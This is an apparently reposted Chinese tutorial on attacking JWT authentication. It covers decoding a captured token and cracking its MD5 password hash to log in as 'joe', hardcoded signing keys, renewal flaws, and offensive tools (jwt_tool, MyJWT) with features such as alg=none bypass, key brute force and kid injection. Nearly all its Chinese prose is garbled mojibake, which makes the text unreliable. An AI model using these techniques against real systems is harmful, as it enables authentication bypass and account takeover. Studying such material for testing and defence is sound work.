°Ð³¡JWTÐÅÏ¢ÈçÉÏËùÊ¾£¬¶øÔÚÊµÕ½ÖÐÎÒÃÇ¿ÉÒÔÈ¥×¥°ü£¬Èç¹û×¥µ½µÄÊý¾Ý°üÖÐÓÐÀàËÆÕâÑùµÄJWTÈÏÖ¤ÄÇÎÒÃÇ¾Í¿ÉÒÔÖ±½ÓÄÃÈ¥½âÃÜÁË£¬ÎÒÃÇÄÃµ½µÄÊý¾ÝÊÇÕâÑùµÄ£º

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsZXZlbCI6ImFkbWluIiwicGFzc3dvcmQiOiIyYWM5Y2I3ZGMwMmIzYzAwODNlYjcwODk4ZTU0OWI2MyIsInVzZXJuYW1lIjoiam9lIn0.6j3NrK-0C7K8gmaWeB9CCyZuQKfvVEAl4KhitRN2p5k

</div>

ÉÏÃæÊÇÒ»¸ö±ê×¼µÄJWTÈÏÖ¤µÄ¸ñÊ½£¬Æä°üº¬Header¡¢Payload¡¢SignatureÈý¸ö²¿·Ö£¬Ã¿¸ö²¿·ÖÖ®¼äÓÖÒÔ"."ºÅ·Ö¸î£¬ËûÕâÀïµÄJWTÈÏÖ¤ÊÇ¾¹ýbase64¼ÓÃÜµÄ£¬ËùÒÔÎÒÃÇÕâÀïÏÈÒªÄÃµ½base64½âÃÜÍøÕ¾È¥½âÃÜÒ»ÏÂ 
https://base64.us/





ÔÚÕâÀïÎÒÃÇ¿ÉÒÔ¿´µ½payload²¿·ÖµÄÊý¾Ý½âÃÜ³öÀ´ºó°üº¬password×Ö¶ÎÐÅÏ¢£¬ºóÃæ½â³öÀ´µÄÊÇÒ»´®MD5Êý¾Ý£¬Ö®ºóÎÒÃÇ½«ÆäÄÃµ½MD5ÔÚÏß½âÃÜÍøÕ¾½øÐÐ½âÃÜ²Ù×÷£º





ËæºóµÃµ½ÃÜÂëPassword1²¢Ê¹ÓÃÆä×÷ÎªÃÜÂë£¬Ê¹ÓÃjoe×÷ÎªÓÃ»§Ãû½øÐÐµÇÂ¼²Ù×÷£º





Ëæºó³É¹¦µÇÂ¼£º





ÃÜÔ¿Ó²±àÂëÀà


»ù±¾½éÉÜ


JWTÖÐµÄÃÜÔ¿ÊÇÓÃÓÚ¶ÔÁîÅÆ½øÐÐÇ©Ãû»ò¼ÓÃÜµÄ¹Ø¼üÐÅÏ¢£¬ÔÚÊµÏÖJWTÊ±ÃÜÔ¿Í¨³£´æ´¢ÔÚÓ¦ÓÃ³ÌÐò´úÂëÖÐ¼´ËùÎ½µÄ"Ó²±àÂë"£¬ÕâÖÖ×ö·¨¿ÉÄÜ»áµ¼ÖÂÒÔÏÂ°²È«ÎÊÌâ£º

<ul style="margin-top:0cm;" type="disc">
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
ÃÜÔ¿Ð¹Â¶£ºÓ²±àÂëµÄÃÜÔ¿¿ÉÒÔ±»¹¥»÷ÕßÇáËÉµØ·¢ÏÖºÍÇÔÈ¡£¬´Ó¶øµ¼ÖÂJWTÁîÅÆ±»´Û¸Ä»ò½âÃÜ£¬½ø¶øµ¼ÖÂ°²È«Â©¶´
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
ÃÜÔ¿¹ÜÀí£ºÓ²±àÂëµÄÃÜÔ¿ÄÑÒÔ½øÐÐ¼¯ÖÐ¹ÜÀí£¬ÎÞ·¨Áé»îµØ½øÐÐÃÜÔ¿ÂÖ»»¡¢ÃÜÔ¿Ê§Ð§µÈ²Ù×÷£¬´Ó¶øÔö¼ÓÁËÃÜÔ¿¹ÜÀíµÄÄÑ¶È
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
ÃÜÔ¿¸´ÓÃ£ºÓ²±àÂëµÄÃÜÔ¿¿ÉÄÜ»á±»¶à¸öÓ¦ÓÃ³ÌÐò»ò·þÎñ¹²ÏíÊ¹ÓÃ£¬Õâ¿ÉÄÜ»áµ¼ÖÂÒ»¸öÓ¦ÓÃ³ÌÐò³öÏÖ°²È«Â©¶´ºó£¬ÆäËûÓ¦ÓÃ³ÌÐòÒ²»áÊÜµ½Ó°Ïì
</li>
</ul>

Â©¶´°¸Àý


JWTÃÜÔ¿Ó²±àÂë£º





»á»°ÐøÆÚ


ÐøÆÚ»úÖÆ


JWT(JSON Web Token)µÄÐøÆÚ»úÖÆÊÇÖ¸ÔÚJWT¹ýÆÚÖ®ºóÍ¨¹ýÒ»¶¨µÄ·½Ê½À´¸üÐÂJWTÁîÅÆ£¬Ê¹Æä¿ÉÒÔ¼ÌÐøÊ¹ÓÃÒÔ¼õÉÙÓÃ»§ÐèÒªÆµ·±ÖØÐÂµÇÂ¼µÄÇé¿ö£¬³£¼ûµÄJWTÐøÆÚ»úÖÆ°üÀ¨£º

<ul style="margin-top:0cm;" type="disc">
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
Ë¢ÐÂÁîÅÆ(Refresh Token)£ºÔÚÓÃ»§µÇÂ¼Ê±³ýÁË»ñÈ¡JWTÁîÅÆÍâ»¹»á»ñÈ¡Ò»¸öË¢ÐÂÁîÅÆ£¬µ±JWTÁîÅÆ¹ýÆÚÊ±¿ÉÒÔÊ¹ÓÃË¢ÐÂÁîÅÆÀ´»ñÈ¡ÐÂµÄJWTÁîÅÆ£¬Ë¢ÐÂÁîÅÆµÄÓÐÐ§ÆÚÍ¨³£±ÈJWTÁîÅÆ³¤²¢ÇÒ»áÔÚÃ¿´ÎÊ¹ÓÃºó¸üÐÂÓÐÐ§ÆÚÒÔÈ·±£°²È«ÐÔ
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
ÑÓ³¤ÓÐÐ§ÆÚ£ºÔÚJWTÁîÅÆ¹ýÆÚÖ®Ç°·þÎñÆ÷¿ÉÒÔ¸ù¾ÝÄ³Ð©Ìõ¼þÀ´ÅÐ¶ÏÊÇ·ñÐèÒªÑÓ³¤JWTÁîÅÆµÄÓÐÐ§ÆÚ£¬ÀýÈç:ÓÃ»§ÔÚ»îÔ¾×´Ì¬¡¢ÁîÅÆ¹ýÆÚÊ±¼ä½Ï¶ÌµÈ£¬Èç¹ûÂú×ãÌõ¼þ·þÎñÆ÷½«·¢ËÍÒ»¸öÐÂµÄJWTÁîÅÆÒÔÌæ»»ÔÀ´µÄJWTÁîÅÆ
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
×Ô¶¯ÐøÆÚ£ºÔÚÊ¹ÓÃJWTÁîÅÆÊ±·þÎñÆ÷¿ÉÒÔ¼ì²éJWTÁîÅÆµÄÓÐÐ§ÆÚ²¢ÔÚÐèÒªÊ±×Ô¶¯ÎªÆäÐøÆÚ£¬ÕâÍ¨³£ÐèÒªÓëÇ°¶ËÓ¦ÓÃ³ÌÐò½øÐÐÅäºÏÒÔÈ·±£ÓÃ»§¿ÉÒÔÎÞ·ìµØÊ¹ÓÃÓ¦ÓÃ³ÌÐò£¬¶ø²»ÐèÒªÖØÐÂµÇÂ¼
</li>
</ul>

ÐøÆÚÎÊÌâ


ÎÞÏÞÊ¹ÓÃ


ÓÃ»§µÇÂ¼³É¹¦»ñÈ¡µ½Ò»¸öJWT Token£¬JWT TokenÓÉ°üº¬Ëã·¨ÐÅÏ¢µÄheaderºÍ°üº¬ÓÃ»§·ÇÃô¸ÐÐÅÏ¢µÄbodyÒÔ¼°¶ÔheaderºÍbodyÊý¾ÝÇ©ÃûºóµÄsingÖµÆ´½Óbase64ºóÉú³É£¬bodyÖÐ°üº¬ÓÃ»§tokenÊ§Ð§Ê±¼ä´Áexp(Ä¬ÈÏ1Ð¡Ê±)¡¢ÓÃ»§id±êÊ¶u


JWT TokenÓÐÐ§ÆÚÎª1Ð¡Ê±











µ«ÊÇÔÚ¹ýÆÚºó·¢ÏÖÊ¹ÓÃÖ®Ç°¹ýÆÚµÄJWT Token¿ÉÒÔ¼ÌÐø½øÐÐ»á»°²Ù×÷





TokenË¢ÐÂÈ±ÏÝ


JWT TokenÔÚÐøÆÚÉè¼ÆÊ±ÓÉÓÚ´úÂë±àÐ´´íÎó½«ÐÂÀÏtoken¸üÐÂÂß¼Éè¼Æ´íÎó£¬Ê¹µÃÐÂTokenºÍÀÏTokenÒ»ÖÂ£¬µ¼ÖÂJWT ÐøÆÚÊ§°Ü


²âÊÔÐ§¹ûÈçÏÂ£º





N¸öÐÂTokenÉú³É


¹¦ÄÜ²âÊÔÊ±·¢ÏÖJWT TokenÊ×´ÎÉú³ÉÊ±Ä¬ÈÏÊ§Ð§Ê±120·ÖÖÓ£¬ÐøÆÚÒµÎñÂß¼ÖÐ½öÔÚJWT TokenµÄºó1/3Ê±¼ä£¬Ò²¾ÍÊÇ80-120·ÖÖÓÊ±½øÐÐÐøÆÚ²Ù×÷£¬ÔÚ´ËÆÚ¼äÓÃ»§µÄToken»á½øÐÐË¢ÐÂ²Ù×÷£¬Ê¹ÓÃÐÂµÄTokenÇëÇóµ½·þÎñÆ÷¶Î£¬·þÎñÆ÷¶Ë»á·µ»ØÒ»¸öÐÂµÄJWT Tokenµ½Ç°¶Ë£¬¹©Ç°¶ËÊ¹ÓÃ£¬µ«ÊÇÔÚÐøÆÚÆÚ¼ä¾ÉµÄToken¿ÉÒÔÎÞÏÞÖÆÉú³É¶à¸öÓÐÐ§µÄJWT Token£¬´æÔÚÒ»¶¨³Ì¶ÈÉÏµÄ±»ÀûÓÃ·çÏÕ








¹¤¾ß¼¯ºÏ


jwt_tool


ÏîÄ¿µØÖ·


https://github.com/ticarpi/jwt_tool





Ö÷Òª¹¦ÄÜ


1¡¢¼ì²éÁîÅÆµÄÓÐÐ§ÐÔ 
2¡¢²âÊÔÒÑÖªÂ©¶´£º 
CVE-2015-2951£ºalg=noneÇ©ÃûÈÆ¹ýÂ©¶´ 
CVE-2016-10555£ºRS / HS256¹«Ô¿²»Æ¥ÅäÂ©¶´ 
CVE-2018-0114£ºKey injectionÂ©¶´ 
CVE-2019-20933 / CVE-2020-28637£ºBlank passwordÂ©¶´ 
CVE-2020-28042£ºNull signatureÂ©¶´ 
3¡¢É¨ÃèÅäÖÃ´íÎó»òÒÑÖªÂ©¶´ 
4¡¢FuzzÉùÃ÷ÖµÒÔÒý·¢ÒâÍâÐÐÎª 
5¡¢²âÊÔsecret/key file/public key/ JWKS keyµÄÓÐÐ§ÐÔ 
6¡¢Í¨¹ý¸ßËÙ×Öµä¹¥»÷Ê¶±ðµÍÇ¿¶Èkey 
7¡¢Ê±¼ä´Á´Û¸Ä 
8¡¢RSAºÍECDSAÃÜÔ¿Éú³ÉºÍÖØ½¨(À´×ÔJWKSÎÄ¼þ) 
9¡¢Î±ÔìÐÂµÄÁîÅÆÍ·ºÍÓÐÐ§ÔØºÉÄÚÈÝ£¬²¢Ê¹ÓÃÃÜÔ¿»òÍ¨¹ýÆäËû¹¥»÷·½·¨´´½¨ÐÂµÄÇ©Ãû


Ê¹ÓÃËµÃ÷


https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool





MyJWT


ÏîÄ¿µØÖ·


https://github.com/tyki6/MyJWT/





 


¹¦ÄÜËµÃ÷

<ul style="margin-top:0cm;" type="disc">
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
copy new jwt to clipboard
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
user Interface (thanks questionary)
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
color output
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
modify jwt (header/Payload)
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
None Vulnerability
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
RSA/HMAC confusion
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
Sign a jwt with key
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
Brute Force to guess key
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
crack jwt with regex to guess key
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
kid injection
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
Jku Bypass
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
X5u Bypass
</li>
</ul>

¸¨Öú½Å±¾


½Å±¾µØÖ·


https://gist.github.com/imparabl3/efcf4a991244b9f8f99ac39a7c8cfe6f





½Å±¾¹¦ÄÜ


ÓÃÓÚÀûÓÃCRLFÂ©¶´µÄ½Å±¾


²Î¿¼Á´½Ó


https://1024tools.com/hmac 
https://github.com/ticarpi/jwt_tool 
https://www.anquanke.com/post/id/236830 
https://www.freebuf.com/articles/web/337347.html 
https://digi.ninja/projects/authlab.php#landleakyjwt 
https://attackdefense.com/challengedetails?cid=1424 
https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list 
https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-unverified-signature


 

<ul style="margin-top:0cm;" type="disc">
<li style="font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:right;text-justify:inter-ideograph;">
 
</li>
</ul>
<p style="font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
ÔÎÄµØÖ·£ºhttps://xz.aliyun.com/t/12906


ÉùÃ÷£º⽂ÖÐËùÉæ¼°µÄ¼¼Êõ¡¢Ë¼Â·ºÍ⼯¾ß½ö¹©ÒÔ°²È«Îª⽬µÄµÄÑ§Ï°½»Á÷Ê¹⽤£¬ÈÎºÎ⼈²»µÃ½«Æä⽤ÓÚ⾮·¨⽤Í¾ÒÔ¼°Ó¯ÀûµÈ⽬µÄ£¬·ñÔòºó¹û⾃⾏³Ðµ£¡£ËùÓÐÉøÍ¸¶¼Ðè»ñÈ¡ÊÚÈ¨£¡

Ò³: [1]

ÖÐ¹úÍøÂçÉøÍ¸²âÊÔÁªÃË's Archiver

¸É»õ | JWTÉøÍ¸×ËÊÆÒ»ÆªÍ¨